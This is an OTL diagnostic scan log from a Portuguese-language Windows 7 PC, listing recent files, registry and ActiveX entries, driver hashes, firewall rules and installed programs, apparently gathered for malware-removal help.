ActiveX: {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack

ActiveX: {3C3901C5-3455-3E0A-A214-0B093A5070A6} - .NET Framework

ActiveX: {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles%\Windows Mail\WinMail.exe" OCInstallUserConfigOE

ActiveX: {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx

ActiveX: {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help

ActiveX: {49C187D7-91E1-459E-9759-2925384BD397} - .NET Framework

ActiveX: {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.6

ActiveX: {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools

ActiveX: {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements

ActiveX: {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player

ActiveX: {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access

ActiveX: {73FA19D0-2D75-11D2-995D-00C04F98BBC9} - Pastas da Web

ActiveX: {7790769C-0471-11d2-AF11-00C04FA35D02} - Address Book 7

ActiveX: {7C028AF8-F614-47B3-82DA-BA94E41B1089} - .NET Framework

ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4340} - regsvr32.exe /s /n /i:U shell32.dll

ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\Windows\System32\ie4uinit.exe -UserConfig

ActiveX: {89B4C1CD-B018-4511-B0A1-5476DBF70820} - C:\Windows\system32\Rundll32.exe C:\Windows\system32\mscories.dll,Install

ActiveX: {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding

ActiveX: {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts

ActiveX: {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help

ActiveX: {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface

ActiveX: >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - %SystemRoot%\system32\unregmp2.exe /ShowWMP

Drivers32: msacm.l3acm - C:\Windows\System32\l3codeca.acm (Fraunhofer Institut Integrierte Schaltungen IIS)

Drivers32: vidc.cvid - C:\Windows\System32\iccvid.dll (Radius Inc.)

========== Files/Folders - Created Within 30 Days ==========

[2013/11/30 11:23:22 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\2011\Desktop\OTL.exe

[2013/11/23 11:05:22 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Winamp

[2013/11/17 13:08:42 | 000,000,000 | ---D | C] -- C:\AdwCleaner

[2013/11/17 11:13:19 | 000,000,000 | ---D | C] -- C:\Users\2011\Desktop\gmer

[2013/11/13 00:34:31 | 002,706,432 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\mshtml.tlb

[2013/11/13 00:34:30 | 002,877,952 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\jscript9.dll

[2013/11/13 00:34:29 | 000,391,168 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieui.dll

[2013/11/13 00:34:29 | 000,061,440 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\iesetup.dll

[2013/11/13 00:34:29 | 000,039,424 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\jsproxy.dll

[2013/11/13 00:34:28 | 000,493,056 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\msfeeds.dll

[2013/11/13 00:34:27 | 000,109,056 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\iesysprep.dll

[2013/11/13 00:34:27 | 000,071,680 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\RegisterIEPKEYs.exe

[2013/11/13 00:34:27 | 000,042,496 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ie4uinit.exe

[2013/11/13 00:34:27 | 000,033,280 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\iernonce.dll

[2013/11/12 23:25:21 | 001,796,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\authui.dll

[2013/11/12 23:25:21 | 000,152,576 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\SmartcardCredentialProvider.dll

[2013/11/12 23:25:15 | 000,220,160 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ncrypt.dll

[2013/11/12 23:25:14 | 000,015,872 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\sspisrv.dll

[2013/11/12 23:25:10 | 000,216,576 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\FWPUCLNT.DLL

[2013/11/12 23:25:09 | 000,656,896 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\nshwfp.dll

[2013/11/08 22:37:09 | 000,403,440 | ---- | C] (AVAST Software) -- C:\Windows\System32\drivers\aswsp.sys

[1 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]

[1 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]

========== Files - Modified Within 30 Days ==========

[2013/11/30 11:23:26 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\2011\Desktop\OTL.exe

[2013/11/30 11:21:01 | 000,001,048 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job

[2013/11/30 11:20:48 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat

[2013/11/30 11:20:43 | 1608,970,240 | -HS- | M] () -- C:\hiberfil.sys

[2013/11/30 00:58:00 | 000,001,052 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job

[2013/11/30 00:50:00 | 000,001,074 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-1065731957-2128596916-2441434026-1000UA.job

[2013/11/29 22:24:42 | 000,017,744 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0

[2013/11/29 22:24:42 | 000,017,744 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0

[2013/11/24 20:50:00 | 000,001,022 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-1065731957-2128596916-2441434026-1000Core.job

[2013/11/22 22:38:34 | 000,663,606 | ---- | M] () -- C:\Windows\System32\prfh0416.dat

[2013/11/22 22:38:34 | 000,615,810 | ---- | M] () -- C:\Windows\System32\perfh009.dat

[2013/11/22 22:38:34 | 000,127,896 | ---- | M] () -- C:\Windows\System32\prfc0416.dat

[2013/11/22 22:38:34 | 000,106,190 | ---- | M] () -- C:\Windows\System32\perfc009.dat

[2013/11/08 22:37:09 | 000,403,440 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswsp.sys

[2013/11/08 22:36:37 | 000,057,672 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswTdi.sys

[2013/11/08 22:36:36 | 000,774,392 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswSnx.sys

[2013/11/08 22:36:36 | 000,070,384 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswMonFlt.sys

[2013/11/08 22:36:36 | 000,035,656 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswFsBlk.sys

[2013/11/08 22:36:35 | 000,269,216 | ---- | M] (AVAST Software) -- C:\Windows\System32\aswBoot.exe

[2013/11/08 22:36:35 | 000,043,152 | ---- | M] (AVAST Software) -- C:\Windows\avastSS.scr

[2013/11/07 12:39:27 | 000,000,902 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job

[1 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]

[1 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]

========== Files Created - No Company Name ==========

[2013/08/26 13:12:10 | 000,000,004 | ---- | C] () -- C:\ProgramData\98

[2013/08/03 16:37:56 | 000,002,006 | -H-- | C] () -- C:\ProgramData\ppctrl.dat

[2013/08/03 16:37:55 | 000,000,004 | ---- | C] () -- C:\ProgramData\99

[2013/08/03 16:37:47 | 000,000,000 | ---- | C] () -- C:\ProgramData\0

[2013/03/03 22:17:49 | 000,178,304 | ---- | C] () -- C:\Windows\System32\drivers\aswVmm.sys

[2013/03/03 22:17:48 | 000,049,944 | ---- | C] () -- C:\Windows\System32\drivers\aswRvrt.sys

[2013/02/10 01:00:51 | 000,109,256 | ---- | C] () -- C:\Windows\System32\EasyHook64.dll

[2013/02/10 01:00:51 | 000,090,824 | ---- | C] () -- C:\Windows\System32\EasyHook32.dll

[2013/01/07 19:58:22 | 000,000,871 | ---- | C] () -- C:\Windows\QIII.INI

[2012/10/12 22:39:15 | 000,004,096 | -H-- | C] () -- C:\Users\2011\AppData\Local\keyfile3.drm

[2012/09/09 20:09:22 | 000,000,766 | ---- | C] () -- C:\Windows\ODBC.INI

[2012/08/25 15:28:41 | 000,026,624 | ---- | C] () -- C:\Windows\System32\ssb6mlm.dll

[2012/08/13 00:42:51 | 000,007,607 | ---- | C] () -- C:\Users\2011\AppData\Local\Resmon.ResmonCfg

[2012/08/12 21:56:40 | 000,178,688 | ---- | C] () -- C:\Windows\System32\unrar.dll

[2012/08/07 23:04:07 | 000,077,824 | ---- | C] () -- C:\Windows\KMService.exe

[2012/08/07 23:04:07 | 000,008,192 | ---- | C] () -- C:\Windows\System32\srvany.exe

[2012/08/07 22:52:48 | 000,080,896 | ---- | C] () -- C:\Windows\System32\RDVGHelper.exe

[2012/08/07 22:50:48 | 000,066,048 | ---- | C] () -- C:\Windows\System32\PrintBrmUi.exe

========== ZeroAccess Check ==========

[2009/07/14 02:42:31 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

"" = %SystemRoot%\system32\shell32.dll -- [2013/07/25 23:55:59 | 012,872,704 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]

"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 10:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

"" = %systemroot%\system32\wbem\wbemess.dll -- [2009/07/13 23:16:17 | 000,342,528 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Both

========== LOP Check ==========

[2013/10/21 22:33:44 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\AVAST Software

[2012/08/12 21:47:52 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\BSplayer

[2012/09/09 16:52:57 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\BSplayer Pro

[2012/12/22 13:00:05 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\Canneverbe Limited

[2013/06/07 19:30:38 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\DAEMON Tools Lite

[2013/05/25 20:21:10 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\EQATEC Analytics

[2012/12/19 19:47:24 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\Foxit Software

[2013/06/27 20:35:06 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\PotPlayerMini

[2013/10/13 16:20:40 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\uTorrent

[2012/09/01 22:54:53 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\Youtube Downloader HD

[2012/09/01 22:28:57 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\Youtube to MP3 Converter

========== Purity Check ==========

========== Custom Scans ==========

< MD5 for: ATAPI.SYS >

[2009/07/13 23:26:15 | 000,021,584 | ---- | M] (Microsoft Corporation) MD5=338C86357871C167A96AB976519BF59E -- C:\Windows\System32\drivers\atapi.sys

[2009/07/13 23:26:15 | 000,021,584 | ---- | M] (Microsoft Corporation) MD5=338C86357871C167A96AB976519BF59E -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_x86_neutral_a5025d31bee4647c\atapi.sys

[2009/07/13 23:26:15 | 000,021,584 | ---- | M] (Microsoft Corporation) MD5=338C86357871C167A96AB976519BF59E -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_x86_neutral_fab873f3e8a3315c\atapi.sys

[2009/07/13 23:26:15 | 000,021,584 | ---- | M] (Microsoft Corporation) MD5=338C86357871C167A96AB976519BF59E -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.1.7600.16385_none_dd0e7e3d82dd640d\atapi.sys

[2009/07/13 23:26:15 | 000,021,584 | ---- | M] (Microsoft Corporation) MD5=338C86357871C167A96AB976519BF59E -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.1.7601.17514_none_df3f92057fcbe7a7\atapi.sys

[2009/07/13 23:26:15 | 000,021,584 | ---- | M] (Microsoft Corporation) MD5=338C86357871C167A96AB976519BF59E -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.1.7601.18231_none_df26d4d57fdef5b0\atapi.sys

[2009/07/13 23:26:15 | 000,021,584 | ---- | M] (Microsoft Corporation) MD5=338C86357871C167A96AB976519BF59E -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.1.7601.22414_none_dfc9143c98e9a6c4\atapi.sys

< MD5 for: CNGAUDIT.DLL >

[2009/07/13 23:15:06 | 000,012,288 | ---- | M] (Microsoft Corporation) MD5=50BA656134F78AF64E4DD3C8B6FEFD7E -- C:\Windows\System32\cngaudit.dll

[2009/07/13 23:15:06 | 000,012,288 | ---- | M] (Microsoft Corporation) MD5=50BA656134F78AF64E4DD3C8B6FEFD7E -- C:\Windows\winsxs\x86_microsoft-windows-cngaudit-dll_31bf3856ad364e35_6.1.7600.16385_none_e83a414890e8132b\cngaudit.dll

< MD5 for: NETLOGON.DLL >

[2010/11/20 10:20:28 | 000,563,712 | ---- | M] (Microsoft Corporation) MD5=C1809B9907ADEDAF16F50C894100883B -- C:\Windows\System32\netlogon.dll

[2010/11/20 10:20:28 | 000,563,712 | ---- | M] (Microsoft Corporation) MD5=C1809B9907ADEDAF16F50C894100883B -- C:\Windows\winsxs\x86_microsoft-windows-security-netlogon_31bf3856ad364e35_6.1.7601.17514_none_ffbf212e963c0162\netlogon.dll

[2009/07/13 23:16:02 | 000,563,712 | ---- | M] (Microsoft Corporation) MD5=EAA75D9000B71F10EEC04D2AE6C60E81 -- C:\Windows\winsxs\x86_microsoft-windows-security-netlogon_31bf3856ad364e35_6.1.7600.16385_none_fd8e0d66994d7dc8\netlogon.dll

< MD5 for: NVSTOR.SYS >

[2011/03/11 03:39:00 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=4380E59A170D88C4F1022EFF6719A8A4 -- C:\Windows\System32\drivers\nvstor.sys

[2011/03/11 03:39:00 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=4380E59A170D88C4F1022EFF6719A8A4 -- C:\Windows\System32\DriverStore\FileRepository\nvraid.inf_x86_neutral_0276fc3b3ea60d41\nvstor.sys

[2011/03/11 03:39:00 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=4380E59A170D88C4F1022EFF6719A8A4 -- C:\Windows\winsxs\x86_nvraid.inf_31bf3856ad364e35_6.1.7601.17577_none_3ba44e691d6eb11d\nvstor.sys

[2011/03/11 03:44:01 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=4520B63899E867F354EE012D34E11536 -- C:\Windows\winsxs\x86_nvraid.inf_31bf3856ad364e35_6.1.7600.16778_none_39bef1ad20475e88\nvstor.sys

[2011/03/11 03:28:10 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=66D468654A58594F5F3BA63D5AD5B1AF -- C:\Windows\winsxs\x86_nvraid.inf_31bf3856ad364e35_6.1.7601.21680_none_3c1c1942369abb77\nvstor.sys

[2011/03/11 03:52:25 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=8A7583A3B58D3EEB28BB26626526BC91 -- C:\Windows\winsxs\x86_nvraid.inf_31bf3856ad364e35_6.1.7600.20921_none_3a779df43942be63\nvstor.sys

[2010/11/20 10:30:06 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=9283C58EBAA2618F93482EB5DABCEC82 -- C:\Windows\System32\DriverStore\FileRepository\nvraid.inf_x86_neutral_dd659ed032d28a14\nvstor.sys

[2010/11/20 10:30:06 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=9283C58EBAA2618F93482EB5DABCEC82 -- C:\Windows\winsxs\x86_nvraid.inf_31bf3856ad364e35_6.1.7601.17514_none_3be22d131d40bd72\nvstor.sys

[2009/07/13 23:20:44 | 000,142,416 | ---- | M] (NVIDIA Corporation) MD5=C99F251A5DE63C6F129CF71933ACED0F -- C:\Windows\winsxs\x86_nvraid.inf_31bf3856ad364e35_6.1.7600.16385_none_39b1194b205239d8\nvstor.sys

< MD5 for: SCECLI.DLL >

[2009/07/13 23:16:13 | 000,175,616 | ---- | M] (Microsoft Corporation) MD5=26073302DAEA83CC5B944C546D6B47D2 -- C:\Windows\winsxs\x86_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.1.7600.16385_none_37e4387f3a6f0483\scecli.dll

[2010/11/20 10:21:04 | 000,175,616 | ---- | M] (Microsoft Corporation) MD5=8124944EC89D6A1815E4E53F5B96AAF4 -- C:\Windows\System32\scecli.dll

[2010/11/20 10:21:04 | 000,175,616 | ---- | M] (Microsoft Corporation) MD5=8124944EC89D6A1815E4E53F5B96AAF4 -- C:\Windows\winsxs\x86_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.1.7601.17514_none_3a154c47375d881d\scecli.dll

========== Alternate Data Streams ==========

@Alternate Data Stream - 128 bytes -> C:\ProgramData\TEMP:56E2E879

< End of report >

OTL Extras logfile created on: 30/11/2013 11:25:47 - Run 1

OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\2011\Desktop

Ultimate Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation

Internet Explorer (Version = 9.10.9200.16736)

Locale: 00000416 | Country: Brasil | Language: PTB | Date Format: dd/MM/yyyy

2,00 Gb Total Physical Memory | 1,51 Gb Available Physical Memory | 75,56% Memory free

4,00 Gb Paging File | 3,35 Gb Available in Paging File | 83,81% Paging File free

Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files

Drive C: | 232,73 Gb Total Space | 106,05 Gb Free Space | 45,57% Space Free | Partition Type: NTFS

Computer Name: 2011_PC | User Name: 2011 | Logged in as Administrator.

Boot Mode: Normal | Scan Mode: All users

Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

========== Extra Registry (SafeList) ==========

========== File Associations ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]

.cpl [@ = cplfile] -- C:\Windows\System32\control.exe (Microsoft Corporation)

.hlp [@ = hlpfile] -- C:\Windows\winhlp32.exe (Microsoft Corporation)

========== Shell Spawning ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]

batfile [open] -- "%1" %*

cmdfile [open] -- "%1" %*

comfile [open] -- "%1" %*

cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)

exefile [open] -- "%1" %*

helpfile [open] -- Reg Error: Key error.

hlpfile [open] -- %SystemRoot%\winhlp32.exe %1 (Microsoft Corporation)

htmlfile [edit] -- "C:\Program Files\Microsoft Office\Office14\msohtmed.exe" %1 (Microsoft Corporation)

htmlfile [print] -- "C:\Program Files\Microsoft Office\Office14\msohtmed.exe" /p %1 (Microsoft Corporation)

inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)

piffile [open] -- "%1" %*

regfile [merge] -- Reg Error: Key error.

scrfile [config] -- "%1"

scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l

scrfile [open] -- "%1" /S

txtfile [edit] -- Reg Error: Key error.

Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1

Directory [AddToPlaylistVLC] -- "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1" (VideoLAN)

Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)

Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

Directory [PlayWithVLC] -- "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1" (VideoLAN)

Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

Folder [explore] -- Reg Error: Value error.

Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

========== Security Center Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]

"cval" = 1

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]

"VistaSp1" = Reg Error: Unknown registry data type -- File not found

"AntiVirusOverride" = 0

"AntiSpywareOverride" = 0

"FirewallOverride" = 0

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]

========== Firewall Settings ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]

"DisableNotifications" = 0

"EnableFirewall" = 1

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]

"DisableNotifications" = 0

"EnableFirewall" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]

"DisableNotifications" = 0

"EnableFirewall" = 0

========== Authorized Applications List ==========

========== Vista Active Open Ports Exception List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]

"{14BED516-BC10-4734-8EAE-D7CE7270E2C4}" = rport=137 | protocol=17 | dir=out | app=system |

"{17D0D93D-C0D5-4DE3-A0EE-983D67DD0EED}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe |

"{180A5BBC-A540-46CC-873B-72AB2903C6C8}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |

"{3933B4D4-774D-44AD-9BC5-F27CB68D704A}" = rport=139 | protocol=6 | dir=out | app=system |

"{40B0A3B1-08D6-4695-85CE-EFD9ADECE922}" = lport=137 | protocol=17 | dir=in | app=system |

"{53DEEA35-4063-4FBE-968D-7C627C52590E}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |

"{59B7BA7C-1FA2-4C2B-9059-1B0F9835A995}" = rport=445 | protocol=6 | dir=out | app=system |

"{5B59BFA3-FBFD-4320-AFD9-06195BD9CF8E}" = lport=2177 | protocol=6 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe |

"{5B725C46-1BB0-4CBB-AF73-52A8524BD930}" = rport=138 | protocol=17 | dir=out | app=system |

"{7527B37C-A7C7-4F3D-A777-F686AC23BFD3}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | name=@firewallapi.dll,-28539 |

"{7B28DD59-42E4-4CA5-8D87-98D70188BB09}" = lport=10243 | protocol=6 | dir=in | app=system |

"{8C50DF56-B77D-41AA-8CE3-0B280CC6C894}" = lport=139 | protocol=6 | dir=in | app=system |

"{987BC7DA-97B8-4170-9DCD-F0B53A436554}" = lport=138 | protocol=17 | dir=in | app=system |

"{9DDAA64A-050C-4062-AADA-79C4C74BE31E}" = rport=2177 | protocol=6 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe |

"{A93786B6-E9FA-4ACB-B558-72E09BDA3E16}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |

"{B07AD1EE-5199-4846-870C-F69889FBBAE6}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |

"{B9295777-935E-4000-B43A-977E539BAD21}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |

"{C2EA7D92-44D4-43F2-A6EB-976AA8EC840D}" = lport=445 | protocol=6 | dir=in | app=system |

"{C6B6FF42-1FF5-4934-87BD-D4279978FC9B}" = rport=10243 | protocol=6 | dir=out | app=system |

"{DFAED4FA-311B-48D0-ACBF-150E24D52FC0}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |

"{E83ECF93-3755-490B-89BB-5FCDBD3679EA}" = lport=2869 | protocol=6 | dir=in | app=system |

"{EF8520FE-2B0C-4405-80C9-36353057B069}" = rport=2177 | protocol=17 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe |

"{F7CC8057-B3D5-4B02-A791-284CEAEC854E}" = lport=2177 | protocol=17 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe |

========== Vista Active Application Exception List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]

"{00E6F382-850C-4A66-9FAB-CA120D501D14}" = protocol=6 | dir=in | app=c:\program files\microsoft office\office14\groove.exe |

"{261EF63F-DEF3-4E9D-93BA-1F72EEA4A2C8}" = protocol=6 | dir=out | app=system |

"{2A3D7EE0-5FBB-4306-A189-B1A28D318C06}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |

"{2A8AF078-CCE3-4836-9039-1321F8725C88}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe |

"{440EB4E4-C8CD-4D8D-BBAE-C90CC6ADD26B}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe |

"{4D0734A3-5826-482F-A05C-ED1498848A93}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |

"{64CBE226-CF2F-45CA-84E0-1EFE3AA727F2}" = protocol=6 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe |

"{65C5FBB5-8EDF-45EA-8C78-EE97DFA2FAA3}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe |

"{66A66E8D-C9D8-4D34-B376-22293E975790}" = protocol=58 | dir=in | name=@firewallapi.dll,-28545 |

"{769E5D5B-2713-4D9A-9E06-D8C980DABB67}" = protocol=6 | dir=in | app=c:\program files\utorrent\utorrent.exe |

"{97639BCD-1327-46F3-9D52-946BC7B4229A}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe |

"{9BE762C3-A0BD-434F-8384-071F49655AA2}" = protocol=1 | dir=out | name=@firewallapi.dll,-28544 |

"{A2E7F4DF-FA6A-4FA4-B510-92890DD31994}" = protocol=6 | dir=in | app=c:\program files\winamp\winamp.exe |

"{A8929234-A172-43B4-8D21-5BAB13B52A91}" = dir=in | app=c:\program files\skype\phone\skype.exe |

"{A9A39500-2614-4539-A99C-FC7787FE743D}" = protocol=1 | dir=in | name=@firewallapi.dll,-28543 |

"{B66239F9-A8A8-40D7-AC1F-CD1490B90E62}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe |

"{C6EB93AF-71EB-4BD2-AAEB-718F5FD4111E}" = protocol=58 | dir=out | name=@firewallapi.dll,-28546 |

"{C8F41095-EED2-4B5E-97AB-78339B7A94AE}" = protocol=17 | dir=in | app=c:\program files\microsoft office\office14\groove.exe |

"{CA8F3AB9-7BD6-48C6-8F41-AE7D1CA4E66A}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe |

"{CD1231C0-C178-43B3-B1FD-223A91B10B62}" = protocol=17 | dir=in | app=c:\program files\winamp\winamp.exe |

"{DB0D8EA1-13C7-4C0A-A472-60DC4FD0A254}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |

"{DDBDECE7-B1F7-4BA5-AC59-974A057CB840}" = protocol=17 | dir=in | app=c:\program files\utorrent\utorrent.exe |

"{F2559E29-3E56-4EDD-B186-F1A566579638}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |

========== HKEY_LOCAL_MACHINE Uninstall List ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]

"{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}" = PDFCreator

"{1111706F-666A-4037-7777-211328764D10}" = JavaFX 2.1.1

"{18455581-E099-4BA8-BC6B-F34B2F06600C}" = Google Toolbar for Internet Explorer

"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148

"{2318C2B1-4965-11d4-9B18-009027A5CD4F}" = Google Toolbar for Internet Explorer

